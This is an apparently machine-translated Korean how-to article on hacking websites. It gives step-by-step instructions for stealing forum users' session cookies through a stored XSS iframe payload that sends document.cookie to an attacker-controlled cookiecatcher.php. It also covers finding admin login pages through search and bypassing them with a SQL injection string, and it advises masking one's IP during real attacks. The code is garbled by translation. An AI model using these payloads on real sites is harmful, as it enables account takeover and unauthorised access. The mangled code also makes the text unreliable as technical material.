웹사이트를 해킹하는 3가지 방법

차례:

웹사이트를 해킹하는 3가지 방법
웹사이트를 해킹하는 3가지 방법
Anonim

메모:

이 문서는 순전히 교육적이며 사람들이 해킹에 대해 배우는 데 도움이 되거나 해커가 웹사이트를 더 잘 보호할 수 있도록 작동하는 방법을 설명할 수 있습니다. 이 튜토리얼은 보안이 취약한 웹사이트에 액세스하기 위해 취해야 할 주요 단계를 제공합니다.

단계

방법 1/3: XSS(교차 사이트 스크립팅) 사용

웹사이트 해킹 1단계

1단계. 콘텐츠를 게시할 수 있는 취약한 사이트를 찾습니다

포럼이 좋은 예입니다. 사이트가 안전하면 작동하지 않는다는 것을 기억하십시오.

웹사이트 해킹 2단계

2단계. 메시지 만들기로 이동합니다

"게시물"을 클릭할 때 민감한 데이터를 캡처하는 특수 코드를 입력해야 합니다.

  • 시스템이 코드를 필터링할 수 있는지 테스트해야 합니다. 우편
  • window.alert("테스트")

    게시물을 클릭할 때 경고 상자가 나타나면 해당 사이트가 공격에 취약하다는 의미입니다.

웹사이트 해킹 3단계

3단계. 쿠키 캐처를 만들고 가져옵니다

이 공격의 목적은 사용자의 쿠키를 캡처하여 사용자의 자격 증명이 취약한 웹 사이트 계정에 액세스할 수 있도록 하는 것입니다. 대상 쿠키를 캡처하여 귀하에게 리디렉션하는 쿠키 캐처가 필요합니다. PHP 언어를 지원하는 액세스 권한이 있는 사이트에서 쿠키 캐처를 로드합니다.

웹사이트 해킹 4단계

4단계. 쿠키 캐처로 메시지를 게시하세요

메시지에 특정 코드를 입력하면 쿠키를 캡처하여 귀하의 사이트로 보내는 데 사용됩니다. 의심을 줄이고 메시지가 지워지는 것을 방지하려면 코드 뒤에 몇 단어의 텍스트를 입력해야 합니다.

  • 다음은 샘플 코드입니다.
  • <iframe 0 높이 = 0 너비 = 0src = JavaScript…: 무효(document.location =

    "귀하의 URL / cookiecatcher.php? C = 문서.쿠키)>

웹사이트 해킹 5단계

5단계. 수집된 쿠키를 사용합니다

수집 후에는 웹사이트에 저장해야 하는 쿠키 정보를 어떤 목적으로든 사용할 수 있습니다.

방법 2/3: 주입 공격 수행

웹사이트 해킹 6단계

1단계. 취약한 사이트를 찾습니다

사이트 관리자 ID를 쉽게 사용할 수 있는지 여부를 알고 취약한 사이트를 찾아야 합니다. admin login.asp에서 Google 검색을 시도하십시오.

웹사이트 해킹 7단계

2단계. 관리자로 로그인합니다

관리자 사용자 이름으로 다른 암호 조합 중 하나를 사용합니다. 임의의 숫자일 수 있으며 상당히 일반적인 예는 1 'or' 1 '=' 1입니다.

웹사이트 해킹 8단계

3단계. 인내심을 가지세요

이 조작은 아마도 여러 번 시도해야 하며 몇 가지 실수를 하게 될 것입니다.

웹사이트 해킹 9단계

4단계. 웹사이트로 이동합니다

웹 사이트가 취약하다고 가정할 때 웹 사이트에 대한 관리자 액세스를 제공하는 조합을 찾을 수 있습니다.

방법 3/3: 성공을 위한 준비

웹사이트 해킹 10단계

1단계. 하나 또는 두 개의 프로그래밍 언어를 배웁니다

웹사이트를 해킹하는 방법을 정말로 배우고 싶다면 컴퓨터와 기타 기술이 어떻게 작동하는지 이해해야 합니다. 컴퓨터를 더 잘 제어하고 시스템의 취약점을 식별하기 위해 Python 또는 SQL과 같은 프로그래밍 언어를 사용하는 방법을 배웁니다.

웹사이트 해킹 11단계

2단계. HTML의 기초를 배웁니다

웹 사이트를 해킹하려면 HTML 및 JavaScript 언어에 대한 이해도 높아야 합니다. 배우는 데 오랜 시간이 걸릴 수 있지만 인터넷에 무료로 제공되는 방법이 많이 있으므로 기꺼이 시도해 볼 수 있습니다.

웹사이트 해킹 12단계

3단계. 화이트햇을 확인하세요

그들은 정직한 목적으로 자신의 능력을 사용하는 해커입니다. 주로 인터넷 보안 허점을 노출하고 누구에게나 더 안전한 브라우징을 제공하기 위한 것입니다. 이런 종류의 정당한 이유로 해킹 기술을 배우고 싶거나 웹사이트 보호 기능을 향상시키려는 경우 일부 화이트햇에게 연락하여 도움을 받는 것이 좋습니다.

웹사이트 해킹 13단계

4단계. 해킹을 조사합니다

해킹하는 방법을 배우고 싶거나 자신을 보호하고 싶다면 많은 조사가 필요합니다. 웹사이트에서 허점을 찾는 다양한 방법이 있으므로 항상 배워야 합니다.

웹사이트 해킹 14단계

5단계. 최신 정보를 유지하세요

잠재적인 취약성 목록이 지속적으로 발전하기 때문에 해킹 기술에 대한 최신 정보를 확인해야 합니다. 특정 유형의 해킹으로부터 보호된다고 해서 항상 안전한 것은 아닙니다!

조언

유용한 팁을 찾으려면 해커 포럼으로 이동하십시오

경고

  • 실제 해킹을 시도하려는 경우 온라인에서 사용할 수 있는 적절한 소프트웨어를 사용하여 IP 주소를 마스킹하십시오.
  • 이 기사를 읽는다고 해커가 되는 것은 아닙니다. 당신은 당신의 기술을 연마하고 연습하고 또 연습해야 합니다.
  • 불법 복제는 불법입니다. 걸리면 본인 잘못입니다.

주제로 인기가 있습니다